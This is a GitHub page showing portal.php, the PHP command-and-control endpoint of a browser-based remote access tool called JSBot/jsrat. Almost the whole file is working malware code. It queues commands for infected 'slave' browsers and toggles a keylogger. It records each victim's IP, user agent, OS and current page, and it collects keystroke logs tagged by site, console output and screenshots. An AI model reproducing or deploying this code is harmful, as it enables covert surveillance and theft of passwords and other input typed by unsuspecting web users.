forked from derp-all-day/JSBot
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathportal.php
159 lines (146 loc) · 5.33 KB
/
portal.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
<?php
header('Access-Control-Allow-Origin: *');
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate"); // HTTP/1.1
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache"); // HTTP/1.0
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past
//Iniciallize classes and stuff
include 'sys/head.php';
$uuid = (new jsrat)->uuid();
//Serve Commands to client
if(key($_GET) === 'recv') {
//Check if there is an active command
if($cmd = $db->table('cnc')->find('active', 'true', 1)->get()) {
$cmd = $cmd[array_key_first($cmd)];
$id = $cmd[array_key_first($cmd)];
//Check if the command is still valid within the scope of its cool-down time
$timer = time() - $cmd['timeIssued'];
if( $timer > 31 ) {
$db->table('cnc')->find('timeIssued', $cmd['timeIssued'], 1)->change('active', 'false');
echo json_encode(array('status' => 'ok_null'));
die();
}
//Check if this command is target specific or not
if($cmd['target'] != 'x') {
//If it's target specific, then lets check if this slave is a specified target
if(!strpos($cmd['target'], $uuid)) {
//Cleanup if slave is not a target
echo json_encode(array('status' => 'ok_null'));
die();
}
}
//check if the slave has been reached yet or not
if(!strpos($cmd['slavesReached'], $uuid)) {
//Add slaves UUID to list of reached slaves
$SR = "{$cmd['slavesReached']}{$uuid}:";
$db->table('cnc')->find(
'timeIssued', $cmd['timeIssued'], 1
)->change('slavesReached', $SR);
//Prepare and serve command data to slave
$args = explode('|#:#|', $cmd['arguments']);
$return = array('status' => 'ok_cmd','command' => $cmd['command']);
$i = 1;
foreach($args as $key => $val) {
$return['argument'.$i] = $val;
$i++;
}
echo json_encode($return);
//list of commands we can delete imidiately after being reached to clear up wait time
if($cmd['command'] === 'keylog' || $cmd['command'] === 'stopkeylog') {
$db->table('cnc')->id($id)->delete();
}
}
//Cleanup
else {
echo json_encode(array('status' => 'ok_null'));
}
}
//Cleanup
else {
echo json_encode(array('status' => 'ok_null'));
}
}
//Recieve Data From Client
elseif(key($_GET) === 'post') {
//'hello' message is a slave checking in
if($_GET['post'] === 'hello') {
//check if we already have seen this slave
if($slave = $db->table('slaves')->find('uuid', $uuid)->get()) {
$slave = $slave[array_key_first($slave)];
if( $db->table('slaves')->find('uuid', $uuid, 1)->change('lastSeen', time()) &&
$db->table('slaves')->find('uuid', $uuid, 1)->change('page', $_POST['ref'])) {
$status = 'ok_update';
$keylogger = $slave['keylog'];
} else {
$status = 'error_update';
$keylogger = 'null';
}
echo json_encode(array('status' => $status, 'log' => $keylogger));
die();
}
//If not, lets add the slave to our list
else {
$status = ($db->table('slaves')->put(array(
'ip' => (new jsrat)->getIP(),
'lastSeen' => time(),
'firstSeen' => time(),
'ua' => (new jsrat)->getUA(),
'os' => (new jsrat)->getOS(),
'uuid' => $uuid,
'page' => ((empty($_POST['ref']))?$_SERVER["HTTP_REFERER"]:$_POST['ref']),
'keylog' => "false"
)))?'ok_new':'error_new';
echo json_encode(array('status' => $status, 'log' => 'false'));
die();
}
} elseif($_GET['post'] == 'klog') {
$log = $_POST['log'];
$ref = (!empty($_POST['ref']))?$_POST['ref']:''; //currentRef
if($row = $db->table('keylogs')->find('uuid', $uuid, 1)->get()) {
$row = $row[array_key_first($row)];
if($row['currentRef'] == $ref || $ref == '') {
$db->table('keylogs')->find('uuid', $uuid)->change('log', $row['log'].$log);
} else {
$db->table('keylogs')->find('uuid', $uuid)->change('log', "{$row['log']}\n\n[SITE: {$ref}]\n{$log}");
$db->table('keylogs')->find('uuid', $uuid)->change('currentRef', $ref);
}
$status = 'kl_update';
} else {
$slave = $db->table('slaves')->find('uuid', $uuid,1)->get();
$slave = $slave[array_key_first($slave)];
$db->table('keylogs')->put(array(
'uuid' => $uuid,
'log' => "[Keylog Started]>\n\n[SITE: {$slave['page']}]\n{$log}",
'currentRef' => $slave['page']
));
$status = 'kl_new';
}
echo json_encode(array('status' => $status));
} elseif($_GET['post'] == 'console' && isset($_POST['cmd'])) {
$output = (empty($_POST['log']))?'undefined':base64_decode($_POST['log']);
$command = $_POST['cmd'];
if($row = $db->table('console')->find('uuid', $uuid, 1)->get()) {
$db->table('console')->find('uuid', $uuid)->change('log', $output);
$status = 'console_update';
} else {
$db->table('console')->put(array(
'uuid' => $uuid,
'log' => $output
));
$status = 'console_new';
}
echo json_encode(array('status' => $status));
} elseif($_GET['post'] == 'screenshot' && isset($_POST['img'])) {
$db->table('screenshots')->put(array(
'uuid' => $uuid,
'blob' => $_POST['img']
));
echo json_encode(array('status' => 'img_store'));
} else {
echo json_encode(array('status' => 'ok_null'));
}
} else {
echo json_encode(array('status' => 'ok_null'));
}
?>